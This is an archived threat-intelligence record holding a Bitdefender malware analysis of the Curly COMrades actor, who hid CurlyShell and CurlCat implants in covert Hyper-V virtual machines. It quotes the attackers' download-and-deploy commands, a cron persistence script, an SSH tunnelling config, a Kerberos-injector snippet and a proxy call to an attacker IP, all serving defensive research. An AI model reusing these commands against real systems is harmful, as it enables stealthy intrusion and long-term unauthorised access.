{ "id": "a1473814-2bd1-4bdd-9610-db428fa28ad0", "created_at": "2026-04-06T00:19:46.52237Z", "updated_at": "2026-04-10T03:36:00.766473Z", "deleted_at": null, "sha1_hash": "3022e37224e3fa2abe43f2cadd50fc8b64422d27", "title": "Curly COMrades: Evasion and Persistence via Hidden Hyper-V Virtual Machines", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 578700, "plain_text": "Curly COMrades: Evasion and Persistence via Hidden Hyper-V\r\nVirtual Machines\r\nBy Victor Vrabie\r\nArchived: 2026-04-05 15:31:00 UTC\r\nI'd like to thank my coauthors Adrian Schipor and Martin Zugec for their invaluable contributions to this\r\nresearch. \r\nTL;DR This investigation, conducted with support from the Georgian CERT functioning under the Operative-Technical Agency of Georgia, uncovered new tools and techniques used by the Curly COMrades threat actor.\r\nThey established covert, long-term access to victim networks by abusing virtualization features (Hyper-V) on\r\ncompromised Windows 10 machines to create a hidden remote operating environment. \r\nWe first documented the Curly COMrades threat actor, operating to support Russian interests in geopolitical\r\nhotbeds, in August 2025. Since that initial discovery, subsequent forensics and incident response efforts have\r\nrevealed critical new tools and techniques.\r\nValuable support was provided by the Georgian CERT, whose collaboration significantly advanced the\r\ninvestigation. They alerted us to a detected sample communicating with a compromised site we were monitoring,\r\nenabling a joint analysis. The Georgian CERT was then instrumental in acquiring evidence and conducting a\r\nforensic analysis of the compromised site itself, which the attackers used as a proxy for their actual infrastructure. \r\nThe most notable finding in this campaign is the exploitation of legitimate virtualization technologies,\r\ndemonstrating how threat actors are innovating to bypass standard EDR solutions as they become commodity\r\ntools.\r\nThe attackers enabled the Hyper-V role on selected victim systems to deploy a minimalistic, Alpine Linux-based\r\nvirtual machine. This hidden environment, with its lightweight footprint (only 120MB disk space and 256MB\r\nmemory), hosted their custom reverse shell, CurlyShell, and a reverse proxy, CurlCat.\r\nhttps://www.bitdefender.com/en-us/blog/businessinsights/curly-comrades-evasion-persistence-hidden-hyper-v-virtual-machines\r\nPage 1 of 13\n\nBy isolating the malware and its execution environment within a VM, the attackers effectively bypassed many\r\ntraditional host-based EDR detections. EDR needs to be complemented by host-based network inspection to detect\r\nC2 traffic escaping the VM, and proactive hardening tools to restrict the initial abuse of native system binaries.\r\n(Bitdefender examples: This functional requirement is met by integrating capabilities like Network Attack\r\nDefense (NAD) and Proactive Hardening and Attack Surface Reduction (PHASR).) \r\nThe threat actor demonstrated a clear determination to maintain a reverse proxy capability, repeatedly introducing\r\nnew tooling into the environment. Artifacts identified included a wide array of proxy and tunneling samples, such\r\nas Resocks, Rsockstun, Ligolo-ng, CCProxy, Stunnel, and SSH-based methods. This flexible and layered\r\napproach was critical for sustaining access. \r\nDuring the investigation, it was also uncovered that a PowerShell script designed for remote command execution\r\nabused Kerberos tickets, further expanding the adversary’s operational toolkit. In addition, multiple PowerShell\r\nscripts configured through Group Policy pointed to a deceptively simple yet effective persistence mechanism tied\r\nto local account creation. \r\nThe following section provides a detailed breakdown of these techniques and the evidence uncovered during\r\nanalysis. \r\nEtt fel inträffade.\r\nDet går inte att köra JavaScript.\r\nSee the expert analysis on the Curly COMrades on our Ctrl-Alt-DECODE episode.\r\nHyper-V Evasion – Host-Isolated Operational Base \r\nThe most interesting finding is the abuse of native Windows virtualization features to establish a covert, isolated\r\noperational base for the C2 implant directly on the victim host. The threat actors enabled the Hyper-V feature on a\r\ncompromised Windows machine, then downloaded and imported a lightweight Alpine Linux-based VM\r\ncontaining their malware to provide persistent, low-visibility access to the local network. \r\nVirtual Machine Deployment \r\nThe operation began in early July, when two remote commands were executed on two computers to enable the\r\nmicrosoft-hyper-v virtualization feature while disabling its management interface: \r\ndism /online /disable-feature /FeatureName:microsoft-hyper-v-Management-clients /norestart  \r\ndism /online /enable-feature /All /LimitAccess /FeatureName:microsoft-hyper-v /norestart \r\nhttps://www.bitdefender.com/en-us/blog/businessinsights/curly-comrades-evasion-persistence-hidden-hyper-v-virtual-machines\r\nPage 2 of 13\n\nA few days later, the deployment phase followed. All commands were prefixed with “cmd.exe /C and all output\r\nwas redirected (both standard output 1 and standard error 2) to a temporary file. \r\n\"cmd.exe\" /C echo curl.exe http://\u003credacted\u003e.md | cmd \u003e c:\\\\Programdata\\\\WindowsUpdateTask_H.tmp 2\u003e\u00261 \r\nThis was a non-intrusive connectivity check for the next download. It uses an unusual redirection pattern when it\r\nechoes (prints on the screen) the curl.exe command and pipes it to a secondary cmd.exe process for execution. \r\n\"cmd.exe\" /C echo curl.exe http://\u003credacted\u003e.md/about.mp4 -o c:\\\\programdata\\\\1.rar | cmd \u003e\r\nc:\\\\Programdata\\\\WindowsUpdateTask_D.tmp 2\u003e\u00261 \r\nUsing the same redirection method, the archive RAR file masquerading as a video file (about.mp4) is saved as\r\n1.rar. \r\n\"cmd.exe\" /C dir \"c:\\\\program Files\" \u003e c:\\\\Programdata\\\\WindowsUpdateTask_X.tmp 2\u003e\u00261 \r\nNext, a dir command was run against c:\\Program Files - likely to verify the presence of required files such as\r\nrar.exe (executed from this location in the next step). \r\n\"cmd.exe\" /C \"c:\\\\program files\\\\WinRAR\\\\rar.exe\" x c:\\\\programdata\\\\1.rar\r\nc:\\\\programdata\\\\microsoft\\\\AppV\\\\app \u003e c:\\\\Programdata\\\\WindowsUpdateTask_z.tmp 2\u003e\u00261 \r\nThe virtual machine files (such as the VHDX and VMCX) are extracted into the deceptive\r\nc:\\\\programdata\\\\microsoft\\\\AppV\\\\app folder. \r\n\"cmd.exe\" /C powershell.exe -c import-vm -path \"c:\\\\programdata\\\\microsoft\\\\AppV\\\\app\\\\Virtual\r\nMachines\\\\1DBCC80B-5803-4AF1-8772-712C688F408A.vmcx\" -Copy -GenerateNewId \u003e\r\nc:\\\\Programdata\\\\WindowsUpdateTask_t.tmp 2\u003e\u00261 \r\nThe Import-VM PowerShell cmdlet is then used to import the virtual machine. This cmdlet registers the pre-configured VM file (.vmcx) extracted in the previous step with the local Hyper-V manager. \r\n\"cmd.exe\" /C powershell.exe -c Start-VM -name WSL \u003e c:\\\\Programdata\\\\WindowsUpdateTask_R.tmp 2\u003e\u00261 \r\nFinally, using the Start-VM PowerShell cmdlet, this newly imported virtual machine is started. While the name\r\nWSL suggests the use of Windows Subsystem for Linux, it’s only a deceptive strategy. WSL is a feature that\r\nallows users to run a Linux environment natively within Windows, and because it is generally considered a benign\r\ndeveloper tool, it often receives less scrutiny. It is critical to note that despite the naming convention, this VM is a\r\nfully isolated Hyper-V instance, entirely separate from and outside of the standard Windows Subsystem for Linux\r\nframework. \r\nVirtual Machine Configuration \r\nThe deployed virtual machine was a custom-configured, victim-specific operational environment. Running the\r\nsecurity-oriented, lightweight Alpine Linux, it occupied a mere 120MB of disk space and was configured to use\r\nonly 256MB of memory. The primary goal of this minimalistic environment was to host the custom implants,\r\nCurlyShell and CurlCat, providing a dedicated, isolated base for the reverse shell and reverse proxy operations. Its\r\nhttps://www.bitdefender.com/en-us/blog/businessinsights/curly-comrades-evasion-persistence-hidden-hyper-v-virtual-machines\r\nPage 3 of 13\n\nminimal footprint and small size minimized the risk of detection, while providing all the tools that attackers\r\nneeded. \r\nThe VM was configured to use the Default Switch network adaptor in Hyper-V. This setting routes the VM's\r\ntraffic through the host's network stack using Hyper-V's internal Network Address Translation (NAT) service.\r\nIn effect, all malicious outbound communication appears to originate from the legitimate host machine's IP\r\naddress. Some of the included files also demonstrate a high degree of tailoring for the compromised domain.\r\nExamination of the VM's file system revealed an attacker-controlled domain-to-IP mapping within the /etc/hosts\r\nfile and a specific private DNS server entry in /etc/resolv.conf, confirming that the VM was customized to\r\ncommunicate with the C2 infrastructure. \r\nVirtual Machine Payload \r\nThe VM was not packed with large offensive frameworks or penetration testing tools; instead, it was a lightweight\r\nimplant designed for a very specific purpose. The environment hosts only two closely related, custom malware\r\nfamilies - CurlyShell (new malware) and CurlCat (previously documented by Bitdefender) - both built using the\r\nlibcurl library but serving distinctly different operational roles.\r\nCurlyShell provides a persistent reverse shell, while CurlCat manages traffic tunneling, giving the threat actor\r\nrobust network access and the ability to execute commands remotely. This minimalist approach avoids leaving a\r\nheavy forensic footprint. \r\nCurlyShell (MD5: c6dbf3de8fd1fc9914fae7a24aa3c43d) in /bin/init_tools is the core persistent reverse shell. For\r\npersistence, it’s using a simple but effective root-level persistence mechanism: a crontab entry located in\r\n/etc/crontabs, running with root privileges. This cron task executes a script /bin/alpine_init, at 20 minutes past\r\nevery fourth hour. The alpine_init script then executes init_tools (CurlyShell) itself. \r\n#!/bin/sh \r\ndate \u003e /tmp/date \r\nnohup /bin/init_tools \u003e /dev/null 2\u003e\u00261 \u0026 \r\nCurlyShell is responsible for establishing and maintaining the primary reverse shell connection using HTTPS for\r\nits communication, connecting to a specific, separate C2 infrastructure. \r\nCurlCat (MD5: 1a6803d9a2110f86bb26fcfda3606302) in /root/updater is managing the SSH reverse proxy tunnel.\r\nIt does not maintain system persistence itself; instead, it can be initiated by a command sent over the persistent\r\nCurlyShell channel when proxy access is needed. Its sole function is to wrap all outgoing SSH traffic into standard\r\nHTTP request payloads, making the traffic blend in on the wire. This capability is integrated directly into the SSH\r\nclient configuration (/root/.ssh/config), where CurlCat is specified as the ProxyCommand to covertly tunnel all\r\nsubsequent SSH connections through a SOCKS proxy listening on port 20155 on the attacker's machine. \r\nHost Forward \r\nHostName 127.0.0.1 \r\nhttps://www.bitdefender.com/en-us/blog/businessinsights/curly-comrades-evasion-persistence-hidden-hyper-v-virtual-machines\r\nPage 4 of 13\n\nPort 22 \r\n    User bob \r\n    StrictHostKeyChecking no \r\n    UserKnownHostsFile /dev/null \r\n    NumberOfPasswordPrompts 1 \r\n    RemoteForward 20155 \r\n    IdentityFile /root/.ssh/id_rsa \r\n    ProxyCommand /root/updater \r\nAuthentication for this tunnel uses a dedicated id_rsa key found in the /root/.ssh/ directory, logging in as the user\r\n\"bob\" to the remote C2 infrastructure. This file is a private SSH key used to authenticate to the remote C2 server\r\nwithout needing a password. \r\nCurlyShell Analysis \r\nThe two custom implants deployed within the Hyper-V environment, CurlyShell and CurlCat (read our previous\r\nanalysis), share a largely identical code base. Both are compiled binaries written in C++ and built around the\r\nlibcurl library. \r\nThe malware is packaged as an ELF binary, with its core functionality implemented in the main() function. At\r\nstartup, file descriptors 0, 1, and 2 are closed (Standard Input (stdin), Standard Output (stdout), and Standard Error\r\n(stderr)). This action suppresses all output to the terminal and detaches the process from the initiating shell,\r\nrunning the CurlyShell invisibly as a headless background daemon. \r\nhttps://www.bitdefender.com/en-us/blog/businessinsights/curly-comrades-evasion-persistence-hidden-hyper-v-virtual-machines\r\nPage 5 of 13\n\nThe code then creates an instance of the custom C++ class, SesCustom. \r\nThe program's custom session management begins with the construction of the SesCustom object. This starts with\r\nthe explicit initialization of a custom Base64 alphabet using a hardcoded 64-character string, which is then loaded\r\ninto internal std::map structures. This custom character set is used by encoding and decoding methods\r\n(SesCustom::to_enc() and SesCustom::to_dec()) to perform a non-standard Base64 transformation. The purpose\r\nis to evade tools expecting the standard alphabet. Furthermore, the constructor immediately calls\r\nSesCustom::get_ses_id() to generate a unique, randomly Base64-encoded string to be used as a PHP session\r\ncookie in the C2 network traffic. \r\nhttps://www.bitdefender.com/en-us/blog/businessinsights/curly-comrades-evasion-persistence-hidden-hyper-v-virtual-machines\r\nPage 6 of 13\n\nOnce the SesCustom object is created, a key-value data structure (implemented in C++ as an std::map) containing\r\nthe required HTTP headers is built and passed to the critical SesCustom::init() method along with the C2 URL.\r\nThis header map includes the spoofed PHP session cookie, required for the C2 handshake mechanism. \r\nThe init() method then sets up the libcurl objects and configures the curl_write_callback. This is a standard feature\r\nof the libcurl library that points this callback to the malware’s own function: SesCustom::WriteFunction(). When\r\nthe C2 server sends an encrypted data back, libcurl hands that raw data off to this custom-written WriteFunction()\r\nfor processing. \r\nAfter initialization, an HTTP GET request is issued to verify C2 responsiveness. The returned data is expected to\r\nprecisely match the PHP session cookie generated earlier. If the response fails to match this session cookie, the\r\ninit() function returns false, causing CurlyShell to terminate immediately. If the server is responsive and returns\r\nthe expected value, the function confirms that the target is a live C2, and the core C2 logic is launched via\r\nSesCustom::to_run(), which implements the reverse shell functionality. \r\nhttps://www.bitdefender.com/en-us/blog/businessinsights/curly-comrades-evasion-persistence-hidden-hyper-v-virtual-machines\r\nPage 7 of 13\n\nUp to this stage, both CurlyShell and CurlCat share almost identical code, with their logic overlapping almost\r\nentirely. The key distinction lies in the to_run() method: in CurlyShell, the received data is interpreted as\r\ncommands to execute, whereas in CurlCat it is forwarded directly to the SSH process. \r\nThe decompiled view shows similarities between CurlCat (left) and CurlyShell (right) code. \r\nThe actual C2 communication and command execution happens in the to_run() method. The method manages data\r\nexchange by switching between HTTP methods: it uses HTTP POST requests to send command output back to the\r\nC2 when data is available, and falls back to HTTP GET requests to poll the server when there is no data to send. \r\nThe primary distinction between the two implants lies in how they process the server’s response. CurlyShell,\r\nbeing the reverse shell, executes incoming commands using the SesCustom::to_pipe() function, which internally\r\nrelies on the popen() system call. The received command is wrapped with timeout 30 sh -c '\u003ccommand\u003e' 2\u003e\u00261 to\r\nlimit the execution time (30 seconds) and capture both standard output and error. CurlCat, in contrast, is designed\r\nonly for data relay; it completely bypasses command execution and instead uses the SesCustom::to_out() and\r\nSesCustom::from_in() functions to simply relay raw data. \r\nhttps://www.bitdefender.com/en-us/blog/businessinsights/curly-comrades-evasion-persistence-hidden-hyper-v-virtual-machines\r\nPage 8 of 13\n\nPowerShell Scripts \r\nThe investigation uncovered two distinct types of PowerShell scripts linked to the attackers. One type was\r\ndesigned to inject a Kerberos ticket into LSASS, enabling authentication to remote systems and execution of\r\ncommands. The other was deployed via Group Policy to create a local account across domain-joined machines\r\nlikely to achieve persistence. \r\nKerberos Ticket Injector \r\nThe threat actor's customized tooling is nicely illustrated by a script dropped at c:\\programdata\\kb_upd.ps1 and\r\nexecuted remotely via PowerShell (often using atexec). This script is a two-part template for remote command\r\nexecution. The first part, which handles loading and injecting a Kerberos ticket into LSASS, is almost identical to\r\nthe public TicketInjector utility. But while the C# string assigned to the $ptt variable is stored in plaintext in the\r\noriginal version, it’s encrypted and stored as a SecureString in this version with a hardcoded key: \r\n$key = (9,25,37,10,5,54,91,82,75,19,13,32,17,94,23,11) \r\n$decData = ConvertTo-SecureString -String $buf -Key $key \r\n$ptt =   [Runtime.InteropServices.Marshal]::PtrToStringAuto([Runtime.InteropServices.Marshal]::\r\nSecureStringToBSTR($decData)) \r\nOnce decrypted, the embedded C# code is compiled and loaded into memory by the Load() function, which serves\r\nthe same purpose as the original TicketInjector utility's entry point. This compiled C# code is responsible for the\r\nactual low-level manipulation of the Kerberos tickets within the LSASS process. \r\nThe second part of the PowerShell script defines two additional functions essential for post-exploitation: \r\nTicket Injection: One function invokes the Load() routine to read the Kerberos ticket and inject the\r\nmodified version into LSASS.\r\nLateral Movement (RemoteWorker): The other key function, RemoteWorker(), executes lateral movement\r\ncommands.\r\nThe RemoteWorker() function is designed as a template for executing post-exploitation tasks, using the newly\r\ninjected Kerberos tickets to authenticate against remote systems via SMB. The following example illustrates this\r\noperation: it uses net use to connect to a remote share, runs reconnaissance commands (dir \\\\\u003credacted\u003e\\C$\\users)\r\nto collect data about user profiles and system files, then deletes the connection, and immediately clears the current\r\nticket cache using klist purge. The function's flexible structure means the threat actor can easily substitute the\r\ncommands for file deletion, malware deployment, or horizontal movement. \r\nhttps://www.bitdefender.com/en-us/blog/businessinsights/curly-comrades-evasion-persistence-hidden-hyper-v-virtual-machines\r\nPage 9 of 13\n\nAn example of RemoteWorker() function. \r\nLocal Account Persistence \r\nDuring forensic analysis, a suspicious PowerShell script was discovered on multiple compromised systems. Found\r\nat c:\\Windows\\ps1\\screensaver.ps1, the script reset the password of the local account user, creating the account if\r\nit did not already exist—likely as a persistence mechanism. \r\nThis script was later replaced by a variant named c:\\Windows\\ps1\\locals.ps1, which instead targeted a local\r\naccount called camera. Further analysis showed the script originated from \\\\\u003cdomain\u003e\\NETLOGON\\GPO\r\ntest\\Scripts\\Localps.ps1, indicating it was distributed through Group Policy. The recurring password reset routine\r\nsuggests an effort to counteract remediation attempts by ensuring continued access even if defenders change the\r\naccount’s password. \r\nAt first, these scripts could not be directly linked to the attack. However, more recent activity involving an attempt\r\nto deploy a Resocks binary revealed that the c:\\Windows\\ps1\\ directory was actively used by this threat actor,\r\nwhich ties these scripts to the intrusion with medium confidence: \r\ncmd.exe /C C:\\Windows\\ps1\\utc.exe 45.43.91[.]10:443 --key \u003credacted\u003e \u003e C:\\Programdata\\regid_1992 2\u003e\u00261  \r\ncmd.exe /C curl http://45.43.91[.]10:443 \u003e C:\\Programdata\\regid_1992 2\u003e\u00261 \r\ncmd.exe /C curl ipinfo.io \u003e C:\\Programdata\\regid_1992 2\u003e\u00261 \r\nInternational Collaboration and C2 Analysis \r\nThe successful mapping and detailed analysis of the CurlCat communication channel were made possible through\r\nswift international cooperation with the Georgian National CERT (CERT.OTA.GOV.GE). This collaboration\r\ndemonstrates the critical value of shared threat intelligence in dismantling sophisticated operations. \r\nhttps://www.bitdefender.com/en-us/blog/businessinsights/curly-comrades-evasion-persistence-hidden-hyper-v-virtual-machines\r\nPage 10 of 13\n\nThe initial connection was established when the Georgian CERT contacted our team regarding a detected CurlCat\r\nsample observed on a system they were monitoring, which was communicating with a compromised site we were\r\nalso tracking. We provided them with an initial analysis of the malware's communication protocol and identified\r\nthe compromised Georgian website being used as an apparent Command and Control (C2) server. \r\nThe Georgian CERT successfully seized the compromised server and performed a detailed forensic analysis,\r\nsharing their findings to complete the picture of the attacker's infrastructure. \r\nThe forensic analysis of the seized, compromised server (running via NGINX) provided the following insights\r\ninto how the attackers used the site to relay CurlCat traffic: \r\nThe attackers configured iptables rules to redirect traffic on port 443 from a specific victim to the attacker’s\r\ninfrastructure at 88.198.91[.]116 on port 22. All other traffic remained unaffected.\r\nThe analysis confirmed the finding from the malware side: the CurlCat sample had been configured with\r\nlibcurl options that disabled TLS certificate verification. This allowed the attackers to use arbitrary\r\ncertificates on the compromised server to successfully decrypt the HTTP traffic and extract the\r\nencapsulated SSH communications.\r\nIn addition, the attackers manually started an sshd service on port 31637 with a customized configuration\r\nand deployed an application-level proxy service on port 443. This proxy implemented TLS and redirected\r\ntunneling traffic to the hidden sshd service.\r\nThe attackers demonstrated a high level of operational security, leaving few traces on the compromised\r\nhost. For example, they issued the unset HISTFILE command to prevent their activity from being recorded\r\nin shell history.\r\nConclusion and Recommendations \r\nThe investigation revealed that the attackers relied on a combination of custom malware and stealth techniques to\r\nestablish and maintain persistence within the victim environment. Two custom malware families — CurlyShell\r\nand CurlCat — were at the center of this activity, sharing a largely identical code base but diverging in how they\r\nhandled received data: CurlyShell executed commands directly, while CurlCat funneled traffic through SSH.\r\nThese tools were deployed and operated to ensure flexible control and adaptability. \r\nA key aspect of the campaign was the abuse of virtualization technologies. By enabling Hyper-V and running\r\nlightweight virtual machines, the attackers created isolated environments from which reverse shells, proxies, and\r\ncustom malware could operate. This isolation protected the custom malware from behavioral analysis, EDR, and\r\nstatic signature scanning that would normally run on the host operating system. However, the resulting reverse\r\nshells and C2 traffic still had to exit the host machine via the network stack.\r\nThis means that while the malware remained isolated, a security layer like Network Attack Defense (NAD)\r\nrunning on the host can still intercept and detect malicious communication patterns as traffic passes through the\r\nhost's network interfaces. NAD includes algorithms for generic content identification, allowing it to recognize\r\nobjects such as executables or URL addresses, even for previously unknown or custom-built protocols. \r\nThroughout the activity, the threat actor demonstrated a strong focus on stealth and operational security.\r\nTechniques included encrypting embedded payloads, abusing native PowerShell capabilities, and minimizing\r\nhttps://www.bitdefender.com/en-us/blog/businessinsights/curly-comrades-evasion-persistence-hidden-hyper-v-virtual-machines\r\nPage 11 of 13\n\nforensic traces on compromised systems.\r\nTo counter stealthy lateral movement, organizations must detect abnormal access to the LSASS process and\r\nsuspicious Kerberos ticket creation or injection attempts, which occur outside the VM and are highly detectable.\r\nUse GravityZone EDR/XDR capabilities to detect malicious access to credential processes and mitigate memory-based attacks. For organizations operating with a lean security staff, adopting Managed Detection and Response\r\n(MDR) services offers an effective solution. \r\nThe sophistication demonstrated by Curly COMrades confirms a key trend: as EDR/XDR  solutions become\r\ncommodity tools, threat actors are getting better at bypassing them through tooling or techniques like VM\r\nisolation.\r\nTo counter this, organizations must move beyond relying on a single security layer and implement defense-in-depth, multilayered security. It is critical to start designing the entire environment to be hostile to attackers. This\r\nmeans using solutions that restrict an adversary's operational space, such as Proactive Hardening and Attack\r\nSurface Reduction (PHASR), which prevents the abuse of native system tools and forces attackers to take riskier,\r\nmore detectable actions, thereby raising the operational cost of the attack and securing the environment at every\r\nlayer. \r\nIOCs and How to Follow Our Research  \r\nFor our OEM partners and integrations, access to our threat intelligence data is primarily provided\r\nprogrammatically. We also offer a user interface, IntelliZone Portal. This is where partners get more ways to\r\ninteract with our data, like an operational dashboard of threats targeting their industry. A full breakdown of this\r\nresearch can be found on the platform under ThreatID BDuos7k53t:  \r\nhttps://intellizone.bitdefender.com/en/threat-search/threats/BDuos7k53t \r\nBeyond our core TI platform, here are three more ways to stay current with our research.  \r\nPublic IOCs on GitHub  \r\nWe are hosting all Indicators of Compromise (IOCs) from this and all future research on a public GitHub\r\nrepository to improve accessibility and collaboration for the entire security community: \r\nhttps://github.com/bitdefender/malware-ioc/blob/master/2025_11_04-curlycomrades-iocs.csv\r\nCtrl-Alt-DECODE \r\nThis research is part of Ctrl-Alt-DECODE, Bitdefender’s newly established threat intelligence initiative. \r\n1. Subscribe to the Newsletter: Get exclusive threat intelligence, original research, and actionable advisories\r\ndirectly from Bitdefender Labs and MDR teams:\r\nhttps://www.linkedin.com/newsletters/7371216616015036416/\r\n2. Watch the Live Series: See the expert analysis on the Curly COMrades on our next Ctrl-Alt-DECODE\r\nepisode (or catch up with our previous episodes). For this session, we're excited to welcome the\r\nBitdefender Labs researcher who led the forensic analysis joining us in the chat, giving you a rare\r\nhttps://www.bitdefender.com/en-us/blog/businessinsights/curly-comrades-evasion-persistence-hidden-hyper-v-virtual-machines\r\nPage 12 of 13\n\nopportunity to ask technical questions about the research, or even what it's really like to work in\r\ncybersecurity forensics:\r\nEtt fel inträffade.\r\nDet går inte att köra JavaScript.\r\nSource: https://www.bitdefender.com/en-us/blog/businessinsights/curly-comrades-evasion-persistence-hidden-hyper-v-virtual-machines\r\nhttps://www.bitdefender.com/en-us/blog/businessinsights/curly-comrades-evasion-persistence-hidden-hyper-v-virtual-machines\r\nPage 13 of 13", "extraction_quality": 1, "language": "EN", "sources": [ "MISPGALAXY", "Malpedia" ], "references": [ "https://www.bitdefender.com/en-us/blog/businessinsights/curly-comrades-evasion-persistence-hidden-hyper-v-virtual-machines" ], "report_names": [ "curly-comrades-evasion-persistence-hidden-hyper-v-virtual-machines" ], "threat_actors": [ { "id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2", "created_at": "2022-10-25T16:07:24.471018Z", "updated_at": "2026-04-10T02:00:05.002374Z", "deleted_at": null, "main_name": "Cron", "aliases": [], "source_name": "ETDA:Cron", "tools": [ "Catelites", "Catelites Bot", "CronBot", "TinyZBot" ], "source_id": "ETDA", "reports": null }, { "id": "8cb98420-1ff5-4a85-977b-b4e063eec334", "created_at": "2026-01-17T02:00:03.200683Z", "updated_at": "2026-04-10T02:00:03.896419Z", "deleted_at": null, "main_name": "Curly COMrades", "aliases": [], "source_name": "MISPGALAXY:Curly COMrades", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434786, "ts_updated_at": 1775792160, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/3022e37224e3fa2abe43f2cadd50fc8b64422d27.pdf", "text": "https://archive.orkl.eu/3022e37224e3fa2abe43f2cadd50fc8b64422d27.txt", "img": "https://archive.orkl.eu/3022e37224e3fa2abe43f2cadd50fc8b64422d27.jpg" } }